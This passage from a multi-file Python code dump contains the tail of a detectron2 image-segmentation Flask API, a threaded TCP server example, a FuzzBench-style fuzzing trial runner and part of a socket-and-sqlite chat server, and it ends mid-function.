requests_batch.append(requests_queue.get(timeout=CHECK_INTERVAL))
except Empty:
continue
batch_outputs = []
for request in requests_batch:
batch_outputs.append(run(request['input'][0], request['input'][1]))
for request, output in zip(requests_batch, batch_outputs):
request['output'] = output
threading.Thread(target=handle_requests_by_batch).start()
def track_event(category, action, label=None, value=0):
data = {
'v': '1', # API Version.
'tid': 'UA-164242824-8', # Tracking ID / Property ID.
# Anonymous Client Identifier. Ideally, this should be a UUID that
# is associated with particular user, device, or browser instance.
'cid': '555',
't': 'event', # Event hit type.
'ec': category, # Event category.
'ea': action, # Event action.
'el': label, # Event label.
'ev': value, # Event value, must be an integer
'ua': 'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14'
}
response = requests.post(
'https://www.google-analytics.com/collect', data=data)
# If the request fails, this will raise a RequestException. Depending
# on your application's needs, this may be a non-error and can be caught
# by the caller.
response.raise_for_status()
def setup_cfg(config_file, confidence_threshold = 0.5, is_gpu = False):
cfg = get_cfg()
cfg.merge_from_file(config_file)
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = confidence_threshold
cfg.MODEL.PANOPTIC_FPN.COMBINE.INSTANCES_CONFIDENCE_THRESH = confidence_threshold
cfg.MODEL.DEVICE = 'cpu' if is_gpu == False else 'cuda'
print(cfg.MODEL.DEVICE)
cfg.freeze()
return cfg
def run(input_file_in_memory, method):
if input_file_in_memory.shape[2] == 4 :
input_file_in_memory = input_file_in_memory[:,:,0:-1]
if method == 'instancesegmentation' or method == 'predictions' :
config_file = '/workspace/detectron2_repo/configs/quick_schedules/mask_rcnn_R_50_FPN_inference_acc_test.yaml'
elif method == 'panopticsegmentation' :
config_file = '/workspace/detectron2_repo/configs/quick_schedules/panoptic_fpn_R_50_inference_acc_test.yaml'
elif method == 'keypoint' :
config_file = '/workspace/detectron2_repo/configs/quick_schedules/keypoint_rcnn_R_50_FPN_inference_acc_test.yaml'
elif method == 'densepose' :
io_buf = None
io_buf = io.BytesIO(apply_net_main(input_file_in_memory))
return io_buf
else :
return {'message': 'invalid parameter'}
cfg = setup_cfg(config_file=config_file, is_gpu=False)
debug = False if method == 'predictions' else True
demo = VisualizationDemo(cfg, debug=debug)
predictions, visualized_output, obj = demo.run_on_image(input_file_in_memory, debug)
if debug :
np_img = visualized_output.get_image()
output_file_in_memory = cv2.cvtColor(np_img, cv2.COLOR_BGR2RGB)
is_success, buffer = cv2.imencode(".jpg", output_file_in_memory)
io_buf = io.BytesIO(buffer)
return io_buf
else :
return obj
@app.route('/health')
def health():
return "ok"
@app.route('/<method>', methods=['POST'])
def run_python(method):
track_event(category='api_cpu', action=f'/${method}')
print(requests_queue.qsize())
if requests_queue.qsize() >= 1:
return 'Too Many Requests', 429
filestr = request.files['file'].read()
preview_mode = request.form.get('preview')
preview_mode = True if preview_mode is not None and preview_mode == 'true' else False
npimg = np.fromstring(filestr, np.uint8)
input_file_in_memory = cv2.imdecode(npimg, cv2.IMREAD_UNCHANGED)
if input_file_in_memory is None :
return jsonify({'message': 'invalid file'}), 400
print(input_file_in_memory.shape)
height, width, _ = input_file_in_memory.shape
if height * width >= 6250000 :
return jsonify({'message': 'too big size image'})
req = {
'input': [input_file_in_memory, method]
}
requests_queue.put(req)
while 'output' not in req:
time.sleep(CHECK_INTERVAL)
ret = req['output']
if type(ret) is dict:
if preview_mode:
dump = json.dumps(ret)
if len(dump) > 1000 :
return jsonify(dump[0:1000]), 200
return jsonify(ret), 200
if is_json(ret) :
return jsonify(ret), 400
else :
return send_file(ret, mimetype='image/jpeg'), 200
if __name__ == "__main__":
app.run(debug=False, port=80, host='0.0.0.0')
|
threadingmixin.py
|
#!/usr/bin/env python
import socket
import threading
import SocketServer
class ThreadedTCPRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
data = self.request.recv(1024)
cur_thread = threading.current_thread()
response = "{}: {}".format(cur_thread.name, data)
self.request.sendall(response)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
pass
def client(ip, port, message):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
try:
sock.sendall(message)
response = sock.recv(1024)
print("Received: {}".format(response))
finally:
sock.close()
if __name__ == "__main__":
# Port 0 means to select an arbitrary unused port
HOST, PORT = "localhost", 0
server = ThreadedTCPServer((HOST, PORT), ThreadedTCPRequestHandler)
ip, port = server.server_address
# Start a thread with the server -- that thread will then start one
# more thread for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
print("Server loop running in thread:", server_thread.name)
client(ip, port, "Hello World 1")
client(ip, port, "Hello World 2")
client(ip, port, "Hello World 3")
server.shutdown()
server.server_close()
|
runner.py
|
#!/usr/bin/env python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs fuzzer for trial."""
from collections import namedtuple
import os
import posixpath
import shlex
import shutil
import subprocess
import sys
import tarfile
import threading
import time
import zipfile
from common import environment
from common import experiment_utils
from common import filesystem
from common import fuzzer_utils
from common import gsutil
from common import logs
from common import new_process
from common import retry
from common import utils
NUM_RETRIES = 3
RETRY_DELAY = 3
FUZZ_TARGET_DIR = '/out'
# This is an optimization to sync corpora only when it is needed. These files
# are temporary files generated during fuzzer runtime and are not related to
# the actual corpora.
EXCLUDE_PATHS = set([
# AFL excludes.
'.cur_input',
'.state',
'fuzz_bitmap',
'fuzzer_stats',
'plot_data',
# QSYM excludes.
'bitmap',
])
CORPUS_ELEMENT_BYTES_LIMIT = 1 * 1024 * 1024
SEED_CORPUS_ARCHIVE_SUFFIX = '_seed_corpus.zip'
File = namedtuple('File', ['path', 'modified_time', 'change_time'])
def _clean_seed_corpus(seed_corpus_dir):
"""Moves seed corpus files from sub-directories into the corpus directory
root. Also, deletes any files that exceed the 1 MB limit."""
if not os.path.exists(seed_corpus_dir):
return
failed_to_move_files = []
for root, _, files in os.walk(seed_corpus_dir):
for filename in files:
file_path = os.path.join(root, filename)
if os.path.getsize(file_path) > CORPUS_ELEMENT_BYTES_LIMIT:
os.remove(file_path)
logs.warning('Removed seed file %s as it exceeds 1 Mb limit.',
file_path)
continue
sha1sum = utils.file_hash(file_path)
new_file_path = os.path.join(seed_corpus_dir, sha1sum)
try:
shutil.move(file_path, new_file_path)
except OSError:
failed_to_move_files.append((file_path, new_file_path))
if failed_to_move_files:
logs.error('Failed to move seed corpus files: %s', failed_to_move_files)
def _get_fuzzer_environment():
"""Returns environment to run the fuzzer in (outside virtualenv)."""
env = os.environ.copy()
path = env.get('PATH')
if not path:
return env
path_parts = path.split(':')
# |VIRTUALENV_DIR| is the virtualenv environment that runner.py is running
# in. Fuzzer dependencies are installed in the system python environment,
# so need to remove it from |PATH|.
virtualenv_dir = env.get('VIRTUALENV_DIR')
if not virtualenv_dir:
return env
path_parts_without_virtualenv = [
p for p in path_parts if not p.startswith(virtualenv_dir)
]
env['PATH'] = ':'.join(path_parts_without_virtualenv)
return env
def get_clusterfuzz_seed_corpus_path(fuzz_target_path):
"""Returns the path of the clusterfuzz seed corpus archive if one exists.
Otherwise returns None."""
fuzz_target_without_extension = os.path.splitext(fuzz_target_path)[0]
seed_corpus_path = (fuzz_target_without_extension +
SEED_CORPUS_ARCHIVE_SUFFIX)
return seed_corpus_path if os.path.exists(seed_corpus_path) else None
def _unpack_clusterfuzz_seed_corpus(fuzz_target_path, corpus_directory):
"""If a clusterfuzz seed corpus archive is available, unpack it into the
corpus directory if it exists. Copied from unpack_seed_corpus in
engine_common.py in ClusterFuzz.
"""
seed_corpus_archive_path = get_clusterfuzz_seed_corpus_path(
fuzz_target_path)
if not seed_corpus_archive_path:
return
with zipfile.ZipFile(seed_corpus_archive_path) as zip_file:
# Unpack seed corpus recursively into the root of the main corpus
# directory.
idx = 0
for seed_corpus_file in zip_file.infolist():
if seed_corpus_file.filename.endswith('/'):
# Ignore directories.
continue
# Allow callers to opt-out of unpacking large files.
if seed_corpus_file.file_size > CORPUS_ELEMENT_BYTES_LIMIT:
continue
output_filename = '%016d' % idx
output_file_path = os.path.join(corpus_directory, output_filename)
zip_file.extract(seed_corpus_file, output_file_path)
idx += 1
logs.info('Unarchived %d files from seed corpus %s.', idx,
seed_corpus_archive_path)
def run_fuzzer(max_total_time, log_filename):
"""Runs the fuzzer using its script. Logs stdout and stderr of the fuzzer
script to |log_filename| if provided."""
input_corpus = environment.get('SEED_CORPUS_DIR')
output_corpus = environment.get('OUTPUT_CORPUS_DIR')
fuzz_target_name = environment.get('FUZZ_TARGET')
target_binary = fuzzer_utils.get_fuzz_target_binary(FUZZ_TARGET_DIR,
fuzz_target_name)
if not target_binary:
logs.error('Fuzz target binary not found.')
return
_unpack_clusterfuzz_seed_corpus(target_binary, input_corpus)
_clean_seed_corpus(input_corpus)
if max_total_time is None:
logs.warning('max_total_time is None. Fuzzing indefinitely.')
runner_niceness = environment.get('RUNNER_NICENESS', 0)
try:
with open(log_filename, 'w') as log_file:
# Because the runner is launched at a higher priority,
# set it back to the default(0) for fuzzing processes.
new_process.execute([
'nice', '-n',
str(0 - runner_niceness), 'python3', '-u', '-c',
('import fuzzer; '
'fuzzer.fuzz('
"'{input_corpus}', '{output_corpus}', '{target_binary}')"
).format(input_corpus=shlex.quote(input_corpus),
output_corpus=shlex.quote(output_corpus),
target_binary=shlex.quote(target_binary))
],
timeout=max_total_time,
output_files=[log_file],
kill_children=True,
env=_get_fuzzer_environment())
except subprocess.CalledProcessError:
logs.error('Fuzz process returned nonzero.')
class TrialRunner: # pylint: disable=too-many-instance-attributes
"""Class for running a trial."""
def __init__(self):
benchmark_fuzzer_directory = '%s-%s' % (environment.get(
'BENCHMARK'), environment.get('FUZZER_VARIANT_NAME'))
if not environment.get('LOCAL_EXPERIMENT'):
bucket = environment.get('CLOUD_EXPERIMENT_BUCKET')
experiment_name = environment.get('EXPERIMENT')
trial = 'trial-%d' % environment.get('TRIAL_ID')
self.gcs_sync_dir = posixpath.join(bucket, experiment_name,
'experiment-folders',
benchmark_fuzzer_directory,
trial)
# Clean the directory before we use it.
gsutil.rm(self.gcs_sync_dir, force=True)
else:
self.gcs_sync_dir = None
self.cycle = 1
self.corpus_dir = 'corpus'
self.corpus_archives_dir = 'corpus-archives'
self.results_dir = 'results'
self.unchanged_cycles_path = os.path.join(self.results_dir,
'unchanged-cycles')
self.last_sync_time = None
self.corpus_dir_contents = set()
def initialize_directories(self):
"""Initialize directories needed for the trial."""
directories = [
self.corpus_dir,
self.corpus_archives_dir,
self.results_dir,
]
for directory in directories:
filesystem.recreate_directory(directory)
def conduct_trial(self):
"""Conduct the benchmarking trial."""
self.initialize_directories()
log_file = os.path.join(self.results_dir, 'fuzzer-log.txt')
logs.info('Starting trial.')
max_total_time = environment.get('MAX_TOTAL_TIME')
args = (max_total_time, log_file)
thread = threading.Thread(target=run_fuzzer, args=args)
thread.start()
while thread.is_alive():
self.sleep_until_next_sync()
self.do_sync()
self.cycle += 1
logs.info('Doing final sync.')
self.do_sync(final_sync=True)
thread.join()
def sleep_until_next_sync(self):
"""Sleep until it is time to do the next sync."""
if self.last_sync_time is not None:
next_sync_time = (self.last_sync_time +
experiment_utils.SNAPSHOT_PERIOD)
sleep_time = next_sync_time - time.time()
if sleep_time < 0:
# Log error if a sync has taken longer than SNAPSHOT_PERIOD and
# messed up our time synchronization.
logs.warning('Sleep time on cycle %d is %d', self.cycle,
sleep_time)
sleep_time = 0
else:
sleep_time = experiment_utils.SNAPSHOT_PERIOD
logs.debug('Sleeping for %d seconds.', sleep_time)
time.sleep(sleep_time)
# last_sync_time is recorded before the sync so that each sync happens
# roughly SNAPSHOT_PERIOD after each other.
self.last_sync_time = time.time()
def _set_corpus_dir_contents(self):
"""Set |self.corpus_dir_contents| to the current contents of
|self.corpus_dir|. Don't include files or directories excluded by
|EXCLUDE_PATHS|."""
self.corpus_dir_contents = set()
corpus_dir = os.path.abspath(self.corpus_dir)
for root, _, files in os.walk(corpus_dir):
# Check if root is excluded.
relpath = os.path.relpath(root, corpus_dir)
if _is_path_excluded(relpath):
continue
for filename in files:
# Check if filename is excluded first.
if _is_path_excluded(filename):
continue
file_path = os.path.join(root, filename)
stat_info = os.stat(file_path)
last_modified_time = stat_info.st_mtime
# Warning: ctime means creation time on Win and may not work as
# expected.
last_changed_time = stat_info.st_ctime
file_tuple = File(file_path, last_modified_time,
last_changed_time)
self.corpus_dir_contents.add(file_tuple)
def is_corpus_dir_same(self):
"""Sets |self.corpus_dir_contents| to the current contents and returns
True if it is the same as the previous contents."""
logs.debug('Checking if corpus dir is the same.')
prev_contents = self.corpus_dir_contents.copy()
self._set_corpus_dir_contents()
return prev_contents == self.corpus_dir_contents
def do_sync(self, final_sync=False):
"""Save corpus archives and results to GCS."""
try:
if not final_sync and self.is_corpus_dir_same():
logs.debug('Cycle: %d unchanged.', self.cycle)
filesystem.append(self.unchanged_cycles_path, str(self.cycle))
else:
logs.debug('Cycle: %d changed.', self.cycle)
self.archive_and_save_corpus()
self.save_results()
logs.debug('Finished sync.')
except Exception: # pylint: disable=broad-except
logs.error('Failed to sync cycle: %d.', self.cycle)
def archive_corpus(self):
"""Archive this cycle's corpus."""
archive = os.path.join(
self.corpus_archives_dir,
experiment_utils.get_corpus_archive_name(self.cycle))
directories = [self.corpus_dir]
if self.cycle == 1:
# Some fuzzers like eclipser and LibFuzzer don't actually copy the
# seed/input corpus to the output corpus (which AFL does do), this
# results in their coverage being undercounted.
seed_corpus = environment.get('SEED_CORPUS_DIR')
directories.append(seed_corpus)
archive_directories(directories, archive)
return archive
def save_corpus_archive(self, archive):
"""Save corpus |archive| to GCS and delete when done."""
if not self.gcs_sync_dir:
return
basename = os.path.basename(archive)
gcs_path = posixpath.join(self.gcs_sync_dir, self.corpus_dir, basename)
# Don't use parallel to avoid stability issues.
gsutil.cp(archive, gcs_path, parallel=False)
# Delete corpus archive so disk doesn't fill up.
os.remove(archive)
@retry.wrap(NUM_RETRIES, RETRY_DELAY,
'experiment.runner.TrialRunner.archive_and_save_corpus')
def archive_and_save_corpus(self):
"""Archive and save the current corpus to GCS."""
archive = self.archive_corpus()
self.save_corpus_archive(archive)
@retry.wrap(NUM_RETRIES, RETRY_DELAY,
'experiment.runner.TrialRunner.save_results')
def save_results(self):
"""Save the results directory to GCS."""
if not self.gcs_sync_dir:
return
# Copy results directory before rsyncing it so that we don't get an
# exception from uploading a file that changes in size. Files can change
# in size because the log file containing the fuzzer's output is in this
# directory and can be written to by the fuzzer at any time.
results_copy = filesystem.make_dir_copy(self.results_dir)
# Don't use parallel because it causes stability issues
# (crbug.com/1053309).
gsutil.rsync(results_copy,
posixpath.join(self.gcs_sync_dir, self.results_dir),
parallel=False)
def archive_directories(directories, archive_path):
"""Create a tar.gz file named |archive_path| containing the contents of each
directory in |directories|."""
with tarfile.open(archive_path, 'w:gz') as tar:
for directory in directories:
tar_directory(directory, tar)
def tar_directory(directory, tar):
"""Add the contents of |directory| to |tar|. Note that this should not
exception just because files and directories are being deleted from
|directory| while this function is being executed."""
directory = os.path.abspath(directory)
directory_name = os.path.basename(directory)
for root, _, files in os.walk(directory):
for filename in files:
file_path = os.path.join(root, filename)
arcname = os.path.join(directory_name,
os.path.relpath(file_path, directory))
try:
tar.add(file_path, arcname=arcname)
except (FileNotFoundError, OSError):
# We will get these errors if files or directories are being
# deleted from |directory| as we archive it. Don't bother
# rescanning the directory, new files will be archived in the
# next sync.
pass
except Exception: # pylint: disable=broad-except
logs.error('Unexpected exception occurred when archiving.')
def _is_path_excluded(path):
"""Is any part of |path| in |EXCLUDE_PATHS|."""
path_parts = path.split(os.sep)
for part in path_parts:
if not part:
continue
if part in EXCLUDE_PATHS:
return True
return False
def experiment_main():
"""Do a trial as part of an experiment."""
logs.info('Doing trial as part of experiment.')
try:
runner = TrialRunner()
runner.conduct_trial()
except Exception as error: # pylint: disable=broad-except
logs.error('Error doing trial.')
raise error
def main():
"""Do an experiment on a development machine or on a GCP runner instance."""
logs.initialize(
default_extras={
'benchmark': environment.get('BENCHMARK'),
'component': 'runner',
'fuzzer': environment.get('FUZZER'),
'trial_id': str(environment.get('TRIAL_ID')),
})
experiment_main()
return 0
if __name__ == '__main__':
sys.exit(main())
|
server.py
|
import os
import json
import base64
import socket
import sqlite3
import datetime
from time import time, sleep
from dkv import demez_key_values as dkv
from uuid import uuid4, UUID
from threading import Thread
from api2.ftp_server import FTPServerAPI
from api2.listener import SocketListener
from api2.dir_tools import CreateDirectory
from api2.shared import *
# ----- These are needed for comparing client and server version -----
# update this whenever the json dict format or encoding/decoding is changed,
# like something that won't be compatible across versions in SendPacket and/or Listener is changed
PROTOCOL_VERSION = 1
PACKET_VERSION = 1
# how messages are sent/displayed,
MESSAGE_VERSION = 1
USER_INFO_VERSION = 1
SERVER_CONFIG_PATH = "server_config.dkv"
CreateDirectory("channels")
class ServerClient(BaseClient, Thread):
def __init__(self, server, connection: socket.socket, ip: str, port: int) -> None:
BaseClient.__init__(self, connection, ip, port)
Thread.__init__(self)
# we can wait for events on multiple sockets and then read and write data when it’s ready
self.socket.setblocking(True) # maybe try designing this with this set to false?
self.server = server
self.private_uuid = None
self.public_uuid = None
self.username = None
self.user_tag = None
self._uuid_verified = False
self.listener = SocketListener(self, self.socket)
self.listener.start()
self.event_function_dict.update({
"init_uuid": self.InitCheckUUID,
"request_uuid": self.InitRequestUUID,
"init_version": self.InitVersionCheck,
"user_info": self.ReceiveUserInfo,
"full_update": self.FullUpdate,
"receive_message": self.ReceiveMessage,
"send_message": self.ReceiveMessage,
"channel_messages": self.SendChannelMessageRange,
})
def WaitForResponse(self) -> dict:
try:
while True:
if self.listener.event_queue:
event = self.listener.event_queue[0]
self.listener.event_queue.remove(event)
return event
elif not self.listener.connected:
return {}
sleep(0.1)
except Exception as F:
PrintException(F, "Exception Waiting for Response: ")
return {}
def InitCheckUUID(self, uuid: Packet) -> None:
self.private_uuid = uuid.content["private"]
self.public_uuid = uuid.content["public"]
all_uuids = self.server.user_info_file.GetAllPrivateUUIDS()
if self.private_uuid not in self.server.user_info_file.GetAllPrivateUUIDS(): # and \
# str(self.public_uuid) not in self.server.user_info_file.GetAllPublicUUIDS():
self.SendPacket("wrong_uuid")
self.WaitForResponse()
self.Disconnect()
else:
self.SendPacket("valid_uuid")
self._uuid_verified = True
self.listener.uuid_verified = True
def InitRequestUUID(self, placeholder: Packet = None) -> None:
self.private_uuid = str(self.server.user_info_file.MakePrivateUUID())
self.public_uuid = str(self.server.user_info_file.MakePublicUUID())
self.SendPacket("send_uuid", {"private": self.private_uuid, "public": self.public_uuid})
self.server.ftp_server.AddUser(self.public_uuid, self.private_uuid)
self._uuid_verified = True
self.listener.uuid_verified = True
def InitVersionCheck(self, client_version: int) -> None:
pass
def FullUpdate(self, placeholder: Packet = None) -> None:
self.SendPacket("channel_list", self.server.GetChannelList())
self.SendPacket("member_list", {"member_list": self.server.user_info_file.GetAllUsersPublic()})
self.SendPacket("server_info", {"server_name": self.server.name})
def ReceiveUserInfo(self, user_info: Packet) -> None:
self.username = user_info.content["username"]
if "user_info" not in user_info.content:
self.user_tag = self.server.user_info_file.MakeUserTag(self.username)
self.SendPacket("user_tag", {"user_tag": self.user_tag})
else:
self.user_tag = user_info.content["user_tag"]
self.server.user_info_file.HandleUserJoin(self.username, self.user_tag, str(self.public_uuid), str(self.private_uuid))
# self.FullUpdate()
def ReceiveMessage(self, message: Packet) -> None:
channel = self.server.GetChannel(message.content["channel"])
channel.AddMessage(message)
message.content["recv"] = message.recv
self.server.Broadcast("receive_message", message.content)
def SendChannelMessageRange(self, event_dict: Packet) -> None:
# ask for a section of the channel event history
channel = self.server.GetChannel(event_dict.content["channel_name"])
channel_page = channel.GetMessages(event_dict.content["message_index"],
50, # might allow client to request more than 50 messages at a time
# also would need to check across event function versions
event_dict.content["direction"])
# channel_page = channel.GetAllMessagesTest()
self.SendPacket("channel_messages", {
"channel_name": event_dict.content["channel_name"],
"start_message": event_dict.content["message_index"],
"message_count": 50,
"messages": channel_page,
})
def HandleEvent(self, packet: Packet) -> None:
if packet.event in self.event_function_dict.keys():
if packet.content:
self.event_function_dict[packet.event](packet)
else:
self.event_function_dict[packet.event]()
else:
TimePrint("Unknown Event: " + packet.event)
def Ping(self) -> None:
self.SendPacket("ping")
def SendDisconnect(self, reason: str):
self.SendPacket("disconnect", {"reason": reason})
def Disconnect(self):
self.socket.close()
self.listener.Stop()
self.server.RemoveClient(self)
self._stopping = True
TimePrint(f"Disconnected - {self.address}")
def run(self) -> None:
TimePrint("socket running")
try:
while True:
while len(self.listener.event_queue) > 0:
event = self.listener.event_queue[0]
self.listener.event_queue.remove(event)
self.HandleEvent(event)
if self._stopping or not self.listener.connected:
self.Disconnect()
break
# apparently this loop was causing the cpu usage to go up to 10%
# and slow the whole program down by a shit ton, so just sleep for 0.1 seconds
sleep(0.1)
except Exception as F:
self.SendDisconnect(" ".join(F.args))
PrintException(F, "Exception On Client Loop, Disconnecting Client: ")
self.Disconnect()
# do i need to have the socket have the channels or some shit?
# no, just connect to the file whenever you need to read/write something
class Channel:
def __init__(self, name: str, description: str = "") -> None:
self.name = name
self.description = description
file = sqlite3.connect("channels/" + name + ".db")
crsr = file.cursor()
# do we have a message table here?
try:
# why does this not work
# CHECK(TYPEOF(time) == 'FLOAT')
# CHECK(TYPEOF(user) == 'CHAR')
# CREATE TABLE if not exists messages
crsr.execute("""
CREATE TABLE messages (
time FLOAT,
user CHAR(36) NOT NULL,
text TEXT(4096)
);""")
except sqlite3.OperationalError as F:
print(str(F))
pass
def GetMessageCount(self) -> int:
file, cursor = self.OpenFile()
cursor.execute("select count (*) from messages;")
message_count = cursor.fetchone()[0]
file.close()
return message_count
def ConnectToFile(self) -> sqlite3.Connection:
return sqlite3.connect("channels/" + self.name + ".db")
@staticmethod
def SaveAndClose(file: sqlite3.Connection) -> None:
file.commit()
file.close()
def GetCursor(self) -> sqlite3.Cursor:
return self.ConnectToFile().cursor()
def OpenFile(self) -> tuple:
file = self.ConnectToFile()
return file, file.cursor()
def DeleteEvent(self, event) -> None:
file, cursor = self.OpenFile()
# delete
# cursor.execute("""DROP TABLE employee;""")
def ExceptExcute(self, ):
pass
# TODO: fix being able to put quotes in here, it doesn't work
def AddMessage(self, message: Packet) -> None:
file, cursor = self.OpenFile()
# time_received = str(datetime.datetime.fromtimestamp(message["time_received"]))
cursor.execute(
"""INSERT INTO messages (time, user, text) VALUES (?, ?, ?);""",
(message.recv, message.content["name"], message.content["text"]))
self.SaveAndClose(file)
def GetAllMessagesTest(self) -> list:
file, cursor = self.OpenFile()
cursor.execute("SELECT * FROM messages ORDER BY time ASC")
messages = cursor.fetchall()
file.close()
return messages
def GetMessages(self, start_message_index: int, message_count: int, msg_direction: str) -> dict:
total_message_count = self.GetMessageCount() - 1
file, cursor = self.OpenFile()
if msg_direction == "back":
start_message_index -= 1
direction = "DESC"
elif msg_direction == "forward":
start_message_index += 1
direction = "ASC"
else:
return {}
# cmd = f"SELECT COUNT(?) from messages ORDER BY time {direction}"
# cmd = f"SELECT COUNT(?) from messages ORDER BY time {direction} offset 0"
cmd = f"SELECT * from messages ORDER BY time {direction} limit ?"
# cmd = f"SELECT * from messages ORDER BY time {direction} limit ? offset ?"
# cmd = "SELECT * from messages ORDER BY time " + direction
try:
# cursor.execute(cmd, (message_count, total_message_count - start_message_index))
# cursor.execute(cmd) # 0 SUPPLIED
cursor.execute(cmd, (str(message_count),)) # 2 SUPPLIED
# WHAT THE FUCK
# cursor.execute(cmd, (direction, ))
except Exception as F:
PrintException(F, "Exception Getting Messages From Channel File: ")
return {}
messages = cursor.fetchall()
file.close()
message_dict = {}
if direction == "DESC":
for index, message in enumerate(messages):
message_dict[start_message_index - index] = message
elif direction == "ASC":
# TODO: test this
for index, message in enumerate(messages):
message_dict[start_message_index + index] = message
return message_dict
def RunCommand(self, command: str):
file, cursor = self.OpenFile()
output = cursor.execute(command)
self.SaveAndClose(file)
return output
# TODO: add search tags, or make functions to call depending on the tags
def Search(self, string: str) -> None:
return
# TODO: make a server config file, like how we have a user config file for clients
class Server:
def __init__(self, name: str, ip: str, port: int, ftp_ip: str, ftp_port: int, max_clients: int) -> None:
self.name = name
self.ip = ip
self.port = int(port)
self.max_clients = int(max_clients)
self.ftp_server = FTPServerAPI(self, int(max_clients), ftp_ip, int(ftp_port))
self.client_uuid_list = {}
self.channel_list = []
self.user_info_file = UserInfoFile()
self.server_config = ServerConfig(self)
for user in self.user_info_file.users:
self.ftp_server.AddUser(user.public_uuid, user.private_uuid)
# The first argument AF_INET is the combined_address domain of the socket.
# This is used when we have an Internet Domain with any two hosts.
# The second argument is the type of socket.
# SOCK_STREAM means that data or characters are read in a continuous flow.
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.client_list = []
self.con_var_list = []
self.con_command_dict = {
"find": self.Find, # TODO: move to cli_server?
# "add_channel": self.AddChannel,
# "rm_channel": self.RemoveChannel,
}
self.Start()
def Start(self) -> None:
self.socket.bind((self.ip, self.port))
Thread(target=self.ListenForClients, args=()).start()
Thread(target=self.ListenConsole, args=()).start() # TODO: remove this and move to cli version
Thread(target=self.ftp_server.StartServer, args=()).start()
def Close(self) -> None:
self.socket.close()
TimePrint("Server closed")
def GetChannelList(self) -> dict:
channel_dict = {}
for channel in self.channel_list:
channel_dict[channel.name] = {
"desc": channel.description,
"count": channel.GetMessageCount(),
}
return channel_dict
def GetChannel(self, channel_name: str) -> str:
for channel in self.channel_list:
if channel.name == channel_name:
return channel
else:
Exception("Channel does not exist")
def RemoveClient(self, client: ServerClient) -> None:
if client.socket in self.client_list:
self.client_list.remove(client.socket)
TimePrint("-------- {0} disconnected --------".format(client.address))
del client
# this will be used for when we receive a message or some shit idk
def Broadcast(self, command: str, *args) -> None:
[client.SendPacket(command, *args) for client in self.client_list]
def Find(self, search: str) -> None:
result = []
for con_command in self.con_command_dict.keys():
if search in con_command:
result.append(con_command)
if result:
print(" - " + "\n - ".join(result))
else:
print("No results for \"" + search + "\" found")
# this will handle ConVars
def ListenConsole(self) -> None:
while True:
try:
command = input()
# TODO: make sure we don't split by spaces in quotes
command_split = command.split(" ")
if command_split[0] in self.con_command_dict.keys():
self.con_command_dict[command_split[0]](*command_split[1:])
except Exception as F:
PrintException(F, "Exception Listening from Console (somehow): ")
def SendBytes(self, client, _bytes: bytes) -> bool:
try:
client.send(_bytes)
return True
except Exception as F:
PrintException(F, "Exception Sending Bytes: ")
client.close()
self.RemoveClient(client)
return False
def ListenForClients(self) -> None:
# self.socket.setblocking(False)
self.socket.listen(self.max_clients)
TimePrint("Server started on {0}:{1}".format(self.ip, str(self.port)))
while True:
try:
"""Accepts a connection request and stores two parameters,
conn which is a socket object for that user, and addr
which contains the IP combined_address of the socket that just
connected"""
conn, addr = self.socket.accept()
# prints the combined_address of the user that just connected
TimePrint(f"Connected - {addr}")
# creates and individual thread for every user that connects
client = ServerClient(self, conn, *addr)
client.start()
self.client_list.append(client)
except KeyboardInterrupt:
self.Close()
break
except Exception as F:
PrintException(F, "Exception Listening For Clients, continuing: ")
continue
class UserInfo:
def __init__(self, username: str = "", user_tag: int = 0, user_picture: str = "", public_uuid: str = "",
private_uuid: str = "", join_date: float = 0.0, last_seen: float = 0.0):
self.username = username
self.user_tag = user_tag
self.user_picture = user_picture
self.public_uuid = public_uuid
self.private_uuid = private_uuid
self.join_date = join_date
self.last_seen = last_seen
def Update(self, username: str = "", user_picture: str = "", last_seen: float = 0.0):
self.username = username
self.user_picture = user_picture
self.last_seen = last_seen
class UserInfoFile:
def __init__(self) -> None:
self.users = []
if not os.path.isfile("user_info.db"):
file, crsr = self.OpenFile()
try:
# username VARCHAR(48)
crsr.execute("""
CREATE TABLE users (
username VARCHAR(48) NOT NULL,
user_tag TINYINT NOT NULL,
user_picture TEXT(2048),
public_uuid CHAR(16) NOT NULL,
private_uuid CHAR(16) NOT NULL,
join_date DATETIME NOT NULL,
last_seen DATETIME NOT NULL
);""")
except sqlite3.OperationalError as F:
print(str(F))
else:
self.InitUsers()
@staticmethod
def ConnectToFile() -> sqlite3.Connection:
return sqlite3.connect("user_info.db")
@staticmethod
def SaveAndClose(file) -> None:
file.commit()
file.close()
def OpenFile(self) -> tuple:
file = self.ConnectToFile()
return file, file.cursor()
def InitUsers(self) -> None:
user_list = self.GetAllUsers()
for user_tuple in user_list:
user = UserInfo(*user_tuple)
self.users.append(user)
def GetUserCount(self) -> int:
file, cursor = self.OpenFile()
cursor.execute("select count (*) from users;")
user_count = cursor.fetchone()[0]
file.close()
return int(user_count)
# changes all tuples in a list to the first value and changes it in the list
@staticmethod
def _TupleToStringInList(tuple_list: list):
for index, item in enumerate(tuple_list):
tuple_list[index] = item[0]
def _GetColumns(self, *columns) -> list:
file, cursor = self.OpenFile()
cursor.execute(f"""SELECT {', '.join(columns)} from users""")
found_columns = cursor.fetchall()
file.close()
if len(columns) == 1 and columns[0] != "*":
self._TupleToStringInList(found_columns)
return found_columns if type(found_columns) == list else []
def GetAllUsersPublic(self) -> dict:
user_dict = {}
user_list = self._GetColumns("username", "user_tag", "user_picture", "join_date", "last_seen", "public_uuid")
for user in user_list:
user_dict[user[-1]] = user[:-1]
return user_dict
def GetAllUsers(self) -> list:
